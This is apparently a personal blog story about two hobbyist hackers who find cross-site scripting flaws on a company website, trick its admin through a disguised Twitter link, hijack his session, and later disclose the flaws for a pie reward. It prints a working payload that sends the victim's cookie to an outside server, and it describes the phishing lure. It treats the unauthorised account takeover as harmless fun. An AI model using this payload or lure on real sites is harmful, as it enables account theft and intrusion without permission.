People like us, hackers, tend to experiment with their knowledge in the wild. Sometimes just in the spirit of learning, but also out of curiosity and having fun. If you are one of those people who have a bad taste in their mouth after saying the word ‘hacker’, please reconsider clicking on the link you just skipped. (Or here, if you’re lazy). The way I see it, hackers usually don’t cause harm, although they might break the law from time to time. This is a true story of how a company dealt with two whitehats, or greyhats if you like.
I don’t exactly recall when it was, but it must be six or seven months ago. Hendrix and Santana just started learning about website security. I mean, of course they knew a little about XSS and SQL injection, but just the basics. Once they started reading the books and papers, a new world opened up; The world of endless hours of hacking.
Website hacking is fun. It’s relatively easy, it’s a relatively new field and you can do lot’s of fun things without being a jerk. So what’s the first thing you do when you first learn about XSS (Cross Site Scripting)? You check if one of those billion dollar companies like Google or Facebook have any obvious XSS vulnerabilities. Of course they don’t. Well they have, just not those obvious ones you are looking for. Then, you check your favourite websites. These might be big websites, just not the really-really big ones. Bingo. Within just a few hours, Hendrix and Santana found several potential targets.
Let’s focus on one of the most interesting targets, let’s call it the pie-target, for now. The pie-target is a website where users can register and comment on articles. This particular website is pretty well-known, but not immensely big. The website is clearly not where the main activity of this company is, since it’s full of sloppy leaks and not maintained very well, from an IT perspective. For example, the search function had an obvious XSS vulnerability; one could just search for “><script>alert(“hi!”);</script> to get a nice alert box from the website, friendly greeting the user. This, however, is not where the fun started for Hendrix and Santana.
A few days later, they found a reply in their mailbox. I don’t know the exact contents of that message, but it was something like:
Thanks for letting us know, we will fix the problem as soon as possible. We already noticed some weird activity on the website the last couple of days, but we were unable to pinpoint the exact problem. If you are able to ‘hack’ us again, there will be a sweet apple pie waiting for you at the office here!
That was all the motivation they needed. Hendrix and Santana quickly fired up their web browsers and started digging for vulnerabilities. First, they checked the subscription form again. They quickly noticed that the pie-admin had already fixed the problem. Nice! Then there was the search page they found vulnerable before. A quick test showed that the page was still vulnerable, and they started working on an exploit.
To test the authentication system, Hendrix and Santana created a new user; fleetmac. Then, when they were logged in with that user, they opened up one of the website’s cookies that was named PHPSESSID. They copied the contents of this cookie and fired up a browser on a different computer. When they ‘pasted’ the cookie and reloaded the page.. they were logged in as fleetmac.
A web server typically sends a cookie containing a unique session identifier to the browser. The web browser will send back that session identifier with each subsequent request. This id identifies the user to the server. If a user authenticates, the server assigns this session id to the user in the system. That way, if you use the same session id on a different machine, the server will ‘think’ you are the same user, thus granting you access to whatever that user has access to, while this user is still logged in. When the user logs out, the session is destroyed and thus no longer valid. This is basicly how almost every website authentication system works, as a result of the web not being designed from the ground up to support this kind of use. Obtaining an admin’s session cookie is usually enough to trick the web server into thinking you are the admin.
http://www.pietarget.com/search?query="><script>i = new Image(); i.src='http://ourserver.com/?c='.concat(document.cookie);</script>
The url they just set up was suspicious looking, so they decided to hide the link with a popular url shortener; bit.ly. This is a common way of sharing url’s using twitter, since twitter only allows messages up to 140 characters in length. They created a url like ‘http://bit.ly/foobar’ and created a fake twitter account. They found out the twitter-name of the admin and sent him a message, similar to this: @pieadmin Check this out! World’s biggest pie: http://bit.ly/foobar
The admin clicked on the link, was directed to the page Hendrix and Santana just set up with the malicious request hidden in an iframe, and within a second he was redirected to a website describing the world’s biggest pie. Without having a clue that he just got pwned, he smiled a bit and started wondering about what his wife would make for dinner.
Meanwhile, Hendrix and Santana had been keeping an eye on the server logs to check if the admin had fallen in their trap yet. Bingo! A nice cookie string flew over their screens. They were quick; they copied the cookie, pasted it in their browser, and reloaded the page…
A few moments of silence as their eyes were fixated on the screen. Then, a big high-five. Then, another high-five. They did it! They made a quick screenshot for the gallery and closed the browser.
In the process of digging for vulnerabilities, Hendrix and Santana found many other possible ways in. They notified the website admin using twitter, with their real accounts this time. When they disclosed as many as five other XSS vulnerabilities, the website admin wanted them to stop. He ordered two pie’s and let Hendrix and Santana come to the office to give them their reward for sharing the newfound vulnerabilities with them.
Hendrix and Santana were nicely greeted at the office. They could smell the delicious pie coming in, and they wondered what kind of attitude the pie-admin would have towards them. To their surprise, pie-admin was really thankful that they disclosed the vulnerabilities to them. When they asked if pie-admin had noticed anything weird lately, the response was a simple ‘no’. “So you didn’t know we took over your account?”, they asked. The admin looked surprised. “Took over what?” “Well, nevermind then.” What matters in the end is that the website is safe now.
Or is it?